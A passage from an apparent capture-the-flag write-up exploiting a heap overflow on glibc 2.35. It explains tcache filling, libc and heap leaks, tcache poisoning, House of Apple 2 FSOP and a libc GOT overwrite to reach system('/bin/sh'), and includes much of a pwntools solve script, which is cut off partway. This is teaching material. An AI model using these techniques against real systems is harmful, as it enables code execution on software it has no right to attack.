which means we need a heap leak first.\nFor the very first chunk in an empty tcache bin, next_chunk_address = NULL, so:\nfd = (address_of_fd_field \u0026gt;\u0026gt; 12) XOR 0 = address_of_fd_field \u0026gt;\u0026gt; 12 This gives us a heap leak for free: if we can read the fd of a singly-freed tcache chunk, we get heap_addr \u0026gt;\u0026gt; 12.\nUnsorted bin, large bins, and small bins # When a chunk is too large for tcache (\u0026gt; 0x410) or tcache is full, it goes to the unsorted bin: a doubly-linked list hanging off main_arena in libc.\nWhen malloc needs a chunk and tcache is empty, it searches the unsorted bin. Chunks that don\u0026rsquo;t match get sorted into size-appropriate bins:\nSmall bins: for sizes \u0026lt; 0x400 (exact-size bins, like tcache but doubly-linked) Large bins: for sizes \u0026gt;= 0x400 (range-based, sorted by size) The key insight for leaking libc: when a chunk is alone in a bin, its fd and bk pointers point back to the bin header inside main_arena, which lives at a known offset from the libc base.\nlibc\u0026rsquo;s internal GOT # Just like the main binary, libc.so.6 itself has a GOT (Global Offset Table) for resolving function calls. Functions like strlen, memcpy, and strncpy use GNU ifunc (indirect functions) to select a CPU-optimized implementation at runtime (e.g., an AVX2 strlen if the CPU supports it). These ifunc GOT entries need to be writable during resolution.\nglibc 2.35 is built with Partial RELRO, not Full RELRO. That means the ifunc GOT entries remain writable for the entire lifetime of the process, even after resolution completes. This was a known weakness, and newer glibc versions (2.39+) started hardening this by making libc\u0026rsquo;s own GOT read-only after ifunc resolution. But glibc 2.35 predates that fix, so these entries are fair game.\nThis matters because puts() internally calls strlen() to determine the string length. If we can overwrite strlen\u0026rsquo;s GOT entry inside libc with system, then puts(str) becomes system(str). On glibc 2.35 (Ubuntu 22.04), pwntools can resolve these directly: libc.got['strncpy'] and libc.got['strlen'] are the writable ifunc GOT entries, sitting just above the RELRO boundary.\nExploit strategy # Both approaches share the same setup:\nForge a fake 0x200 chunk using the heap overflow, iteratively filling tcache and pushing one into the unsorted bin Leak libc by overflowing non-null padding up to the unsorted bin fd pointer, then reading through it with puts() Leak the heap the same way: overflow padding reaches a tcache chunk\u0026rsquo;s mangled fd Then the approaches diverge:\nApproach 1 (intended): Poison tcache → overwrite strlen GOT in libc with system → puts(\u0026quot;/bin/sh\u0026quot;) triggers system(\u0026quot;/bin/sh\u0026quot;) Approach 2 (alternative): Poison tcache → overwrite _IO_list_all → trigger House of Apple 2 FSOP via exit() Phase 1: Iterative tcache fill → unsorted bin # We need a freed chunk in the unsorted bin to get a libc leak. The unsorted bin is a doubly-linked list managed by glibc\u0026rsquo;s allocator, and its list head lives inside main_arena, a global struct in libc that holds all of the allocator\u0026rsquo;s bookkeeping (bin heads, top chunk pointer, etc.). When a chunk is the only entry in the unsorted bin, its fd and bk both point back to the list head at main_arena + 96, which is a known fixed offset inside libc. Leaking either pointer gives us libc\u0026rsquo;s base address.\nChunks only go to the unsorted bin when their tcache bin is full (7 entries). Otherwise, free() puts them in tcache, where fd pointers are heap addresses (useless for a libc leak).\nWhy forge a different size? # Our max allocation is 0xf8, which gives us chunk size 0x100 at most. We only have 2 note slots. If we kept freeing real 0x100 chunks, the next malloc(0xf8) would just pull them right back out of tcache[0x100], and we\u0026rsquo;d never fill it. The trick is to forge a size that doesn\u0026rsquo;t match what we allocate. We allocate 0x20 chunks (via size=0xc), but overflow to rewrite the chunk header to 0x201 before freeing. The low 3 bits of the size field are flags, not part of the size: bit 0 is PREV_INUSE (indicating the previous chunk is allocated), which must be set or glibc thinks the previous chunk is free and tries to coalesce. So 0x201 = size 0x200 with PREV_INUSE set. Glibc sees a 0x200 chunk and puts it in tcache[0x200]. Our subsequent malloc(0xc) allocations pull from tcache[0x20], so the 0x200 entries stay in tcache and accumulate. After 7 iterations, tcache[0x200] is full, and the 8th free goes to the unsorted bin.\nThe loop # Each iteration: create two 0x20 chunks, free note0 (goes to tcache[0x20]), then re-create note0 with size=4 (triggering the overflow) to rewrite note1\u0026rsquo;s chunk header from 0x21 to 0x201. Then free note1 (glibc sees 0x200), free note0.\nfor i in range(8): create(io, 0, 0xc, b\u0026#39;X\u0026#39;) # note0: 0x20 chunk create(io, 1, 0xc, b\u0026#39;X\u0026#39;) # note1: 0x20 chunk delete(io, 0) # free note0 -\u0026gt; tcache[0x20] # Overflow from note0 to forge note1\u0026#39;s size as 0x201 overflow = b\u0026#39;A\u0026#39; * (0x10 + i * 0x20) # padding grows each iteration overflow += p64(0x20) + p64(0x201) # forged prev_size + size overflow += b\u0026#39;A\u0026#39; * 0x18 # chunk body padding overflow += p64(0x20d31 - i * 0x20) # preserve top chunk size if i == 7: # last iteration: unsorted bin needs fence chunks overflow += b\u0026#39;A\u0026#39; * 0x1d8 overflow += p64(0x21) + b\u0026#39;A\u0026#39; * 0x18 + p64(0x21) create(io, 0, 4, overflow) # size=4 -\u0026gt; resized to 65532, overflow! delete(io, 1) # free forged 0x200 chunk delete(io, 0) Why the padding grows # On each iteration, note0 is recycled from tcache[0x20] at the same address (heap+0x290). But note1 is allocated fresh from the top chunk each time, because its previous 0x20 chunk was freed as a 0x200 entry into a different tcache bin. So note1 moves 0x20 bytes further from note0 on each pass, and the overflow padding grows by 0x20 to bridge the increasing gap.\nTop chunk size # The top chunk is the free space at the end of the heap. Every allocation carves bytes from it, and glibc tracks its size in the chunk header. If it\u0026rsquo;s wrong, future allocations crash.\nThe initial heap is 0x21000 bytes (glibc\u0026rsquo;s default brk allocation). At the start of the loop, the heap looks like:\nblock-beta columns 2 a[\"0x000\"]:1 A[\"tcache_perthread_struct (0x290)\"]:1 b[\"0x290\"]:1 B[\"note0 (0x20)\"]:1 c[\"0x2B0\"]:1 C[\"note1 (0x20)\"]:1 d[\"0x2D0\"]:1 D[\"top chunk (0x20D31)\"]:1 style a fill:none,stroke:none,color:#8b949e style b fill:none,stroke:none,color:#8b949e style c fill:none,stroke:none,color:#8b949e style d fill:none,stroke:none,color:#8b949e style A fill:#2d333b,stroke:#444 style B fill:#1a6334,stroke:#2ea043 style C fill:#1a6334,stroke:#2ea043 style D fill:#1c3049,stroke:#388bfd So the top chunk size = 0x21000 - 0x2D0 = 0x20D30, plus the PREV_INUSE bit = 0x20D31. Our overflow writes past note1 into the top chunk header, so we need to preserve this value. It shrinks by 0x20 each iteration as note1 moves further out, consuming more space from the top.\nFence chunks (iteration 7 only) # The first 7 frees go into tcache, which has almost no validation: it doesn\u0026rsquo;t check neighboring chunk headers at all. But the 8th free goes to the unsorted bin, which is pickier.\nYou might wonder: normally, freeing a chunk adjacent to the top chunk works fine, so why do we need fences? The difference is that normally, _int_free detects that the next chunk IS the top chunk (nextchunk == av-\u0026gt;top) and takes a special consolidate-with-top path that skips most checks. But our forged 0x200 chunk\u0026rsquo;s \u0026ldquo;next chunk\u0026rdquo; (at chunk + 0x200) lands somewhere in the middle of the top chunk, not at its actual header. Glibc doesn\u0026rsquo;t recognize it as the top chunk, so it takes the normal code path, which does three checks:\nNext chunk\u0026rsquo;s PREV_INUSE bit: at chunk + size, the next chunk\u0026rsquo;s size field must have bit 0 set (PREV_INUSE). Otherwise glibc thinks our chunk is already free and aborts with \u0026ldquo;double free or corruption\u0026rdquo;. Next chunk\u0026rsquo;s size must be reasonable: glibc checks 2 * SIZE_SZ \u0026lt; next_size \u0026lt; av-\u0026gt;system_mem, where SIZE_SZ is sizeof(size_t) (8 on 64-bit, so the minimum is 0x10), and av is the malloc_state* pointer to the arena (i.e., main_arena), whose system_mem field tracks how much memory the arena has obtained from the OS via brk (0x21000 in our case). A zero or impossibly large size triggers \u0026ldquo;invalid next size\u0026rdquo;. Next-next chunk\u0026rsquo;s PREV_INUSE bit: glibc reads the chunk at nextchunk + nextsize to check its PREV_INUSE bit. If it\u0026rsquo;s clear, glibc thinks nextchunk is also free and tries to forward-consolidate by unlinking it from its bin. That unlink follows fd/bk pointers, which would crash on our garbage data. We write two fake 0x21 headers as \u0026ldquo;fences\u0026rdquo; after the forged chunk. Here\u0026rsquo;s how glibc navigates them:\nblock-beta columns 5 A[\"forged 0x200 chunk\"]:2 B[\"fence₁ (0x21)\"]:1 C[\"0x18 body\"]:1 D[\"fence₂ (0x21)\"]:1 style A fill:#1c3049,stroke:#388bfd style B fill:#5a3a1e,stroke:#d29922 style C fill:#5a3a1e,stroke:#d29922 style D fill:#1c3049,stroke:#388bfd Step 1: glibc looks at chunk + 0x200 (the forged size) and finds fence₁. It reads the size field: 0x21 = size 0x20 with PREV_INUSE set. This satisfies checks 1 (PREV_INUSE) and 2 (0x20 is a valid size).\nStep 2: glibc then needs to check if fence₁ itself is free (to decide about forward consolidation). It does this by looking at fence₁\u0026rsquo;s \u0026ldquo;next chunk\u0026rdquo;, which is at fence₁ + 0x20 (fence₁\u0026rsquo;s size). Remember the chunk layout from earlier:\nblock-beta columns 4 a[\"fence₁\"]:1 B[\"size: 0x21\\n(8 bytes)\"]:1 C[\"chunk body\\n(0x18 bytes)\"]:1 D[\"fence₂\\nsize: 0x21\"]:1 style a fill:none,stroke:none,color:#8b949e style B fill:#5a3a1e,stroke:#d29922 style C fill:#5a3a1e,stroke:#d29922 style D fill:#1c3049,stroke:#388bfd Fence₁ is a 0x20-size chunk: 0x8 bytes for the size field + 0x18 bytes of body = 0x20 total. So fence₁ + 0x20 lands exactly at fence₂. Glibc reads fence₂\u0026rsquo;s PREV_INUSE bit (set), concludes fence₁ is in-use, and skips consolidation. Check 3 satisfied.\nThe 0x18 bytes between the two fences isn\u0026rsquo;t arbitrary padding. It\u0026rsquo;s fence₁\u0026rsquo;s chunk body, and it\u0026rsquo;s exactly the right size to make glibc\u0026rsquo;s fence₁ + size arithmetic land on fence₂.\nThis is only needed on the last iteration because that\u0026rsquo;s the only free that hits the unsorted bin path.\nPhase 2: Libc leak # After the loop, the unsorted bin contains a chunk with fd and bk pointing back to the unsorted bin\u0026rsquo;s list head inside main_arena. But why is that at offset 96 (0x60)? Let\u0026rsquo;s trace through the real glibc source.\nThe malloc_state struct (malloc/malloc.c) defines main_arena\u0026rsquo;s layout:\nstruct malloc_state { __libc_lock_define (, mutex); // 0x00: 4 bytes int flags; // 0x04: 4 bytes int have_fastchunks; // 0x08: 4 bytes (+4 padding) mfastbinptr fastbinsY[NFASTBINS]; // 0x10: 10 * 8 = 80 bytes mchunkptr top; // 0x60: 8 bytes mchunkptr last_remainder; // 0x68: 8 bytes mchunkptr bins[NBINS * 2 - 2]; // 0x70: the bin array // ... }; The unsorted bin is bin index 1. Glibc accesses bins through the bin_at macro that treats the bins array as if each pair of entries is the fd/bk of a fake malloc_chunk:\n#define bin_at(m, i) \\ (mbinptr) (((char *) \u0026amp;((m)-\u0026gt;bins[((i) - 1) * 2])) \\ - offsetof (struct malloc_chunk, fd)) Since fd is at offset 0x10 in malloc_chunk (after the 8-byte prev_size and 8-byte size header fields), bin_at(main_arena, 1) points 0x10 bytes before bins[0]. That\u0026rsquo;s 0x70 - 0x10 = 0x60 = 96 bytes into main_arena. When a freed chunk is alone in the unsorted bin, its fd and bk both point back to this fake chunk header, giving us main_arena + 96.\nWe need to read this pointer.\nThe trick: overflow from note0 with a long padding of 'A' bytes that bridges the gap between note0 and the unsorted bin chunk\u0026rsquo;s data area. When we call puts(notes[0]), it prints the 'A' padding and continues past it into the unsorted bin fd pointer, until it hits a null byte.\nblock-beta columns 5 a[\"0x2A0\"]:1 A[\"note0\\ndata\"]:1 B[\"'A' * 0x100 overflow\"]:2 C[\"fd\\n→ main_arena+96\"]:1 style a fill:none,stroke:none,color:#8b949e style A fill:#1a6334,stroke:#2ea043 style B fill:#5a3a1e,stroke:#d29922 style C fill:#6e3630,stroke:#f85149 puts() starts at note0\u0026rsquo;s data (0x2A0), reads through the 0x100 bytes of 'A' padding (no null bytes), and continues into the fd pointer. Since libc addresses look like 0x7f??????????, the low 6 bytes are non-null in little endian, so puts() prints them before hitting the null high bytes.\ncreate(io, 0, 4, b\u0026#39;A\u0026#39; * 0x100) # overflow: 0x100 \u0026#39;A\u0026#39;s reach the fd data = show(io, 0) # puts() prints: \u0026#39;A\u0026#39;*0x100 + fd bytes UNSORTED_FD = 0x21ace0 # main_arena + 96 (unsorted bin fd) libc.address = u64(data[0x100:].ljust(8, b\u0026#39;\\x00\u0026#39;)) - UNSORTED_FD Phase 3: Heap leak # For tcache poisoning, we need to know heap_addr \u0026gt;\u0026gt; 12 to compute the safe-linking mangled pointer. We leak this the same way as the libc leak: overflow padding + puts(), but this time targeting a tcache chunk\u0026rsquo;s mangled fd.\nFirst, we need to fix up the heap. The libc leak overwrote everything with 'A' bytes, corrupting the unsorted bin chunk\u0026rsquo;s fd/bk pointers and surrounding headers. If we leave it like this, glibc will crash on the next allocation that touches the unsorted bin. We use another overflow to restore valid metadata:\nunsorted_fd = libc.address + UNSORTED_FD delete(io, 0) create(io, 0, 4, b\u0026#39;A\u0026#39; * 0xf8 + p64(0x21) + p64(unsorted_fd) * 2 + p64(0x20) + p64(0x20c50)) What each piece restores (starting from note0\u0026rsquo;s data at 0x2A0):\nblock-beta columns 5 a[\"0x2A0\"]:1 A[\"'A' * 0xf8\\npadding\"]:1 B[\"0x21\\nchunk hdr\"]:1 C[\"fd + bk\\n→ unsorted bin\"]:1 D[\"top chunk\\nsize\"]:1 style a fill:none,stroke:none,color:#8b949e style A fill:#2d333b,stroke:#444 style B fill:#5a3a1e,stroke:#d29922 style C fill:#6e3630,stroke:#f85149 style D fill:#1c3049,stroke:#388bfd b'A' * 0xf8 - padding to reach the corrupted area p64(0x21) - restores the chunk header before the unsorted bin chunk (size 0x20 + PREV_INUSE) p64(unsorted_fd) * 2 - restores the unsorted bin chunk\u0026rsquo;s fd and bk back to main_arena + 96, so the allocator sees a valid doubly-linked list p64(0x20) + p64(0x20c50) - restores prev_size and the top chunk size so future allocations from top don\u0026rsquo;t crash Then we set up a tcache[0x20] entry to leak from. When note1 is freed into an empty tcache bin, its fd becomes PROTECT_PTR(pos, NULL) = pos \u0026gt;\u0026gt; 12 (the mangler value):\ncreate(io, 1, 0xc, b\u0026#39;X\u0026#39;) delete(io, 1) # tcache[0x20]: note1 (fd = \u0026amp;fd \u0026gt;\u0026gt; 12) delete(io, 0) # tcache[0x20]: note0 -\u0026gt; note1 flowchart LR T[\"tcache[0x20]\"] --\u003e A[\"note0\"] --\u003e B[\"note1 (fd = heap \u003e\u003e 12)\"] --\u003e N[\"NULL\"] style T fill:#2d333b,stroke:#444 style A fill:#1a6334,stroke:#2ea043 style B fill:#6e3630,stroke:#f85149 style N fill:none,stroke:#444,color:#8b949e note1 was freed first into an empty bin, so its fd = pos \u0026gt;\u0026gt; 12. note0 was freed second, so it points to note1.\nNow the same overflow trick: re-create note0 with size=4, write 0x100 'A' bytes that bridge from note0\u0026rsquo;s data all the way to note1\u0026rsquo;s fd:\ncreate(io, 0, 4, b\u0026#39;A\u0026#39; * 0x100) data = show(io, 0) mangler = u64(data[0x100:].ljust(8, b\u0026#39;\\x00\u0026#39;)) block-beta columns 5 a[\"0x2A0\"]:1 A[\"note0\\ndata\"]:1 B[\"'A' * 0x100 overflow\"]:2 C[\"fd\\n= heap \u003e\u003e 12\"]:1 style a fill:none,stroke:none,color:#8b949e style A fill:#1a6334,stroke:#2ea043 style B fill:#5a3a1e,stroke:#d29922 style C fill:#6e3630,stroke:#f85149 The mangler value has the form 0x00000000055xxxxx: the low 4-5 bytes are non-null, which puts() prints. The high bytes are zero, but ljust(8, b'\\x00') fills those in. This gives us the exact value we need for PROTECT_PTR.\nPhase 4: Tcache poisoning # Now we have both heap and libc addresses. We need to make malloc() return a pointer to _IO_list_all in libc. The technique: tcache poisoning.\nThe idea:\nFree two 0x30-size chunks into the tcache: chunk_A -\u0026gt; chunk_B -\u0026gt; NULL Overwrite chunk_A\u0026rsquo;s fd with a mangled pointer to _IO_list_all First malloc(0x20) returns chunk_A Second malloc(0x20) follows the poisoned fd and returns _IO_list_all Before poisoning:\nflowchart LR T[\"tcache[0x30]\"] --\u003e A[\"chunk_A\"] --\u003e B[\"chunk_B\"] --\u003e N[\"NULL\"] style T fill:#2d333b,stroke:#444 style A fill:#1a6334,stroke:#2ea043 style B fill:#1a6334,stroke:#2ea043 style N fill:none,stroke:#444,color:#8b949e After overflow corrupts chunk_A\u0026rsquo;s fd:\nflowchart LR T[\"tcache[0x30]\"] --\u003e A[\"chunk_A\"] --\u003e IO[\"_IO_list_all\\n(libc)\"] style T fill:#2d333b,stroke:#444 style A fill:#1a6334,stroke:#2ea043 style IO fill:#6e3630,stroke:#f85149 The safe-linked fd we need to write:\nmangled_target = mangler ^ io_list_all Where mangler is the heap_addr \u0026gt;\u0026gt; 12 value we recovered from the heap leak (Phase 3).\nWe use a second overflow (same size=0 trick) to write this poisoned fd into the freed tcache chunks. The overflow payload also contains our fake FILE struct for the FSOP chain, placed at a known heap offset. Pwntools\u0026rsquo; flat() is very useful here: instead of slicing into a bytearray at magic offsets, we describe the payload as {offset: data}:\no2 = flat({ 0xb0: p64(mangled_target), # poisoned fd -\u0026gt; _IO_list_all 0x160: bytes(fp), # fake FILE struct 0x248: wide_data, # fake _wide_data 0x330: wide_vtable, # fake wide vtable # ... }, filler=b\u0026#39;\\x00\u0026#39;, length=0x400) Phase 5: House of Apple 2 FSOP # What is _IO_list_all? # In glibc, every open FILE (stdin, stdout, stderr, and any fopen()\u0026rsquo;d files) is a _IO_FILE struct. These are linked together in a singly-linked list, and _IO_list_all is the global pointer to the head of that list. Normally it points to stderr → stdout → stdin → NULL.\nWhat is FSOP? # FSOP (File Stream Oriented Programming) abuses the fact that glibc walks this list and calls virtual functions on each FILE in certain situations. The most useful trigger is exit(): when a program exits, glibc calls _IO_flush_all_lockp() to flush every open file\u0026rsquo;s buffers (write any buffered data out to the underlying file descriptor). For each FILE in the list, it calls the overflow function from the FILE\u0026rsquo;s vtable (a function pointer table at offset 0xd8 in the struct). Normally, overflow is what writes a FILE\u0026rsquo;s internal buffer out to the actual file descriptor when the buffer is full (the buffer \u0026ldquo;overflows\u0026rdquo;, so it needs to be drained). During exit, it\u0026rsquo;s called one last time to flush any remaining data.\nIf we can overwrite _IO_list_all to point at a fake FILE struct we control, glibc will call whatever function pointer we put in the vtable. That\u0026rsquo;s arbitrary code execution. And _IO_list_all is not protected by RELRO. It\u0026rsquo;s a regular global variable in libc\u0026rsquo;s writable data segment (.bss), not a GOT entry or relocation. RELRO only protects the GOT. Glibc needs to modify _IO_list_all at runtime whenever a file is opened or closed (e.g., fopen() prepends to the list), so it has to be writable. We use our tcache poisoning from Phase 4 to make malloc() return a pointer to it, then write the address of our fake FILE. This replaces the entire list: the real FILEs (stderr, stdout, stdin) are no longer reachable, and glibc only processes our fake FILE before hitting NULL.\nWhy House of Apple 2? # In glibc 2.24+, the main vtable pointer is validated by IO_validate_vtable(). It must point within a legitimate vtable section, so we can\u0026rsquo;t just point it at system directly. House of Apple 2 bypasses this by setting the vtable to _IO_wfile_jumps (a real, validated vtable). This routes execution through the wide character code path, which uses a second vtable (_wide_vtable) stored inside _wide_data. This second vtable is not validated, giving us a clean function pointer hijack.\nThe call chain in glibc source # We\u0026rsquo;ve written fake_file_addr to _IO_list_all via tcache poisoning. When exit(0) is called, glibc walks the FILE list and calls each FILE\u0026rsquo;s vtable overflow. Since we set the vtable to _IO_wfile_jumps, the first function called is _IO_wfile_overflow. Here\u0026rsquo;s the real glibc 2.35 source (libio/wfileops.c):\nwint_t _IO_wfile_overflow (FILE *f, wint_t wch) { if (f-\u0026gt;_flags \u0026amp; _IO_NO_WRITES) { /* ... error ... */ } /* If currently reading or no buffer allocated. */ if ((f-\u0026gt;_flags \u0026amp; _IO_CURRENTLY_PUTTING) == 0) { if (f-\u0026gt;_wide_data-\u0026gt;_IO_write_base == 0) { _IO_wdoallocbuf (f); // \u0026lt;-- we reach here // ... Constraint: _flags must not have _IO_NO_WRITES (0x8) or _IO_CURRENTLY_PUTTING (0x800), and _wide_data-\u0026gt;_IO_write_base must be NULL. Our \u0026quot; sh\\x00\u0026quot; flags value (0x00006873) satisfies all of these.\nNext, _IO_wdoallocbuf (libio/wgenops.c):\nvoid _IO_wdoallocbuf (FILE *fp) { if (fp-\u0026gt;_wide_data-\u0026gt;_IO_buf_base) return; // must be NULL to continue if (!(fp-\u0026gt;_flags \u0026amp; _IO_UNBUFFERED)) if ((wint_t)_IO_WDOALLOCATE (fp) != WEOF) // \u0026lt;-- dispatches through wide vtable return; // ... Constraint: _wide_data-\u0026gt;_IO_buf_base must be NULL and _flags must not have _IO_UNBUFFERED (0x2).\nFinally, _IO_WDOALLOCATE is a macro (libio/libioP.h) that dispatches through the wide vtable:\n#define _IO_WDOALLOCATE(FP) WJUMP0 (__doallocate, FP) // expands to: // (FP-\u0026gt;_wide_data-\u0026gt;_wide_vtable-\u0026gt;__doallocate)(FP) The FP pointer is passed as the first argument. Since _flags is at offset 0 of the FILE struct and we set it to \u0026quot; sh\\x00\u0026quot;, the call becomes system(\u0026quot; sh\u0026quot;).\nThe full chain:\nexit() → _IO_flush_all_lockp() → _IO_wfile_overflow(fp, EOF) vtable-\u0026gt;overflow → _IO_wdoallocbuf(fp) _wide_data-\u0026gt;_IO_write_base == NULL → _IO_WDOALLOCATE(fp) _wide_data-\u0026gt;_IO_buf_base == NULL → fp-\u0026gt;_wide_data-\u0026gt;_wide_vtable-\u0026gt;__doallocate(fp) → system(\u0026#34; sh\u0026#34;) offset 0x68 in our fake wide vtable Building the fake FILE # A _IO_FILE struct is large (~0xe8 bytes) with many fields. We only need to set a few to steer execution. Pwntools provides FileStructure for constructing these with named fields instead of raw byte offsets:\nfake_file_addr = heap_base + 0x400 # known location on heap fp = FileStructure() fp.flags = u64(b\u0026#39; sh\\x00\\x00\\x00\\x00\\x00\u0026#39;) # doubles as system() argument! fp._IO_buf_base = 0 # triggers _IO_wdoallocbuf fp._lock = fake_file_addr + 0xe0 # must point to writable NULL fp._wide_data = fake_file_addr + 0xe8 # -\u0026gt; our fake wide data struct fp.vtable = io_wfile_jumps # _IO_wfile_jumps (legitimate vtable) # _mode is at offset 0xc0, inside FileStructure\u0026#39;s \u0026#34;unknown2\u0026#34; region mode_data = bytearray(48) mode_data[0x18:0x1c] = p32(1) # _mode = 1 (enables wide code path) fp.unknown2 = bytes(mode_data) The _flags field is at offset 0 of the FILE struct. When system() is called, its argument is a pointer to the FILE struct itself, so the first bytes of _flags become the command string. We set it to \u0026quot; sh\\x00\u0026quot; (space + sh), which system() interprets as running /bin/sh.\nThe wide data and wide vtable # The _wide_data struct and its vtable don\u0026rsquo;t have pwntools helpers, but we can use flat() to place data at named offsets rather than slicing bytearrays:\n# Fake _wide_data (pointed to by fp._wide_data) wide_data = flat({ 0x18: p64(0), # _IO_write_base = 0 0x20: p64(1), # _IO_write_ptr = 1 (must be \u0026gt; write_base) 0x30: p64(0), # _IO_buf_base = 0 0xe0: p64(wide_vtable_addr), # _wide_vtable -\u0026gt; our fake vtable }, filler=b\u0026#39;\\x00\u0026#39;, length=0xe8) # Fake wide vtable wide_vtable = flat({ 0x68: p64(system_addr), # __doallocate offset }, filler=b\u0026#39;\\x00\u0026#39;, length=0x70) The chain: _IO_wfile_overflow sees write_ptr \u0026gt; write_base, checks _IO_buf_base == NULL, calls _IO_wdoallocbuf, which calls _IO_WDOALLOCATE. This dereferences _wide_vtable-\u0026gt;__doallocate (offset 0x68), which we\u0026rsquo;ve pointed to system.\nAlternative: libc GOT overwrite (intended solution) # The intended solution skips FSOP entirely. Instead of building fake FILE structs and triggering exit(), it overwrites strlen\u0026rsquo;s GOT entry inside libc with system. This works because puts() internally calls strlen() to determine the string length.\nAfter obtaining the same libc and heap leaks (phases 1-3), the endgame is:\n# Tcache poison targeting strlen\u0026#39;s ifunc GOT slot in libc strlen_got = libc.got[\u0026#39;strncpy\u0026#39;] # strncpy and strlen GOT entries are adjacent poisoned_fd = mangler ^ strlen_got Same tcache poisoning setup as the FSOP approach (two 0x30 entries, overflow to corrupt fd), but instead of pointing at _IO_list_all, we point at libc\u0026rsquo;s internal GOT. The two qwords at libc.got['strncpy'] are the resolved ifunc entries for strncpy and strlen:\ncreate(io, 1, 0x20, b\u0026#39;/bin/sh\\x00\u0026#39;) # consumes first tcache entry, note1 = \u0026#34;/bin/sh\u0026#34; delete(io, 0) create(io, 0, 0x20, p64(libc.sym[\u0026#39;strncpy\u0026#39;]) + # preserve strncpy\u0026#39;s resolved address p64(libc.sym[\u0026#39;system\u0026#39;]) # overwrite strlen -\u0026gt; system ) Now strlen points to system. The trigger:\nshow(io, 1) # puts(\u0026#34;/bin/sh\u0026#34;) -\u0026gt; strlen(\u0026#34;/bin/sh\u0026#34;) -\u0026gt; system(\u0026#34;/bin/sh\u0026#34;) flowchart LR P[\"puts('/bin/sh')\"] --\u003e|\"calls internally\"| G[\"libc GOT: strlen\"] G --\u003e|\"resolved to\"| S[\"system('/bin/sh')\"] style P fill:#2d333b,stroke:#444 style G fill:#5a3a1e,stroke:#d29922 style S fill:#6e3630,stroke:#f85149 That\u0026rsquo;s it. No fake FILE structs, no wide vtables, no exit trigger. Just a single function pointer swap. This works because libc.so.6 on Ubuntu 22.04 (glibc 2.35) has Partial RELRO, leaving the ifunc GOT entries writable at libc.got['strncpy'] and libc.got['strlen'], just above the read-only RELRO boundary.\nSolve scripts # House of Apple 2 FSOP from pwn import * context.arch = \u0026#39;amd64\u0026#39; exe = ELF(\u0026#39;./chall_patched\u0026#39;, checksec=False) libc = ELF(\u0026#39;./libc.so.6\u0026#39;, checksec=False) context.binary = exe mangle = lambda ptr, pos: ptr ^ (pos \u0026gt;\u0026gt; 12) def create(io, idx, size, data): io.sendlineafter(b\u0026#39;\u0026gt; \u0026#39;, b\u0026#39;1\u0026#39;) io.sendlineafter(b\u0026#39;Index: \u0026#39;, str(idx).encode()) io.sendlineafter(b\u0026#39;Size: \u0026#39;, str(size).encode()) io.sendafter(b\u0026#39;Data: \u0026#39;, data) def delete(io, idx): io.sendlineafter(b\u0026#39;\u0026gt; \u0026#39;, b\u0026#39;2\u0026#39;) io.sendlineafter(b\u0026#39;Index: \u0026#39;, str(idx).encode()) def show(io, idx): io.sendlineafter(b\u0026#39;\u0026gt; \u0026#39;, b\u0026#39;3\u0026#39;) io.sendlineafter(b\u0026#39;Index: \u0026#39;, str(idx).encode()) return io.recvline(keepends=False) UNSORTED_FD = 0x21ace0 # main_arena + 96 (unsorted bin fd) io = remote(\u0026#39;chall.lac.tf\u0026#39;, 31144) if args.REMOTE else process([exe.path]) # ── Phase 1: Fill tcache[0x200] + push one to unsorted bin ── for i in range(8): create(io, 0, 0xc, b\u0026#39;X\u0026#39;) create(io, 1, 0xc, b\u0026#39;X\u0026#39;) delete(io, 0) overflow = b\u0026#39;A\u0026#39; * (0x10 + i * 0x20) overflow += p64(0x20) + p64(0x201) overflow += b\u0026#39;A\u0026#39; * 0x18 overflow += p64(0x20d31 - i * 0x20) if i == 7: overflow += b\u0026#39;A\u0026#39; * 0x1d8 overflow += p64(0x21) + b\u0026#39;A\u0026#39; * 0x18 + p64(0x21) create(io, 0, 4, overflow) delete(io, 1) delete(io, 0) # ── Phase 2: Libc leak ── create(io, 0, 4, b\u0026#39;A\u0026#39; * 0x100) data = show(io, 0) libc.address = u64(data[0x100:].ljust(8, b\u0026#39;\\x00\u0026#39;)) - UNSORTED_FD log.info(f\u0026#39;{hex(libc.address)=}\u0026#39;) # ── Phase 3: Heap leak ── unsorted_fd = libc.address + UNSORTED_FD delete(io, 0) create(io, 0, 4, b\u0026#39;A\u0026#39; * 0xf8 + p64(0x21) + p64(unsorted_fd) * 2 + p64(0x20) + p64(0x20c50)) create(io, 1, 0xc, b\u0026#39;X\u0026#39;) delete(io, 1) delete(io, 0) create(io, 0, 4, b\u0026#39;A\u0026#39; * 0x100) data = show(io, 0) mangler = u64(data[0x100:].ljust(8, b\u0026#39;\\x00\u0026#39;)) log.info(f\u0026#39;{hex(mangler)=}\u0026#39;) delete(io, 0) create(io, 0, 4, b\u0026#39;A\u0026#39; * 0xf8 + p64(0x21)) # ── Phase 4: Tcache poisoning → _IO_list_all + fake FILE ── heap_base = mangler \u0026lt;\u0026lt; 12 io_list_all = libc.sym[\u0026#39;_IO_list_all\u0026#39;] io_wfile_jumps = libc.sym[\u0026#39;_IO_wfile_jumps\u0026#39;] # Set up two 0x30 tcache entries for poisoning delete(io, 0) create(io, 0, 0x20, b\u0026#39;X\u0026#39; * 0x18) # 0x30 chunk from top (heap+0x3B0) create(io, 1, 0x20, b\u0026#39;Y\u0026#39; * 0x18) # 0x30 chunk from top (heap+0x3E0) delete(io, 1) # tcache[0x30]: heap+0x3E0 delete(io, 0) # tcache[0x30]: heap+0x3B0 → heap+0x3E0 # Build fake FILE struct fake_file_addr = heap_base + 0x420 wide_data_addr = fake_file_addr + 0xe8 wide_vtable_addr = wide_data_addr + 0xe8 fp = FileStructure() fp.flags = u64(b\u0026#39; sh\\x00\\x00\\x00\\x00\\x00\u0026#39;) fp._IO_buf_base = 0 fp._lock = fake_file_addr + 0xe0 fp._wide_data = wide_data_addr fp.vtable = io_wfile_jumps mode_bytes = bytearray(48) mode_bytes[0x18:0x1c] = p32(1) fp.unknown2 = bytes(mode_bytes) wide_data = flat({ 0x18: p64(0), 0x20: p64(1), 0x30: p64(0), 0xe0: p64(wide_vtable_addr), }, filler=b\u0026#39;\\x00\u0026#39;, length=0xe8) wide_vtable = flat({ 0x68: p64(libc.sym[\u0026#39;system\u0026#39;]), }, filler=b\u0026#39;\\x00\u0026#39;, length=0x70) # Overflow: poison tcache + embed fake FILE structs # note0\u0026#39;s 0x30 chunk is at heap+0x3B0, note1\u0026#39;s at heap+0x3E0 o2 = flat({ 0x110: p64(0) + p64(0x31), # note0 chunk header 0x120: p64(mangle(io_list_all, heap_base + 0x3C0)), # 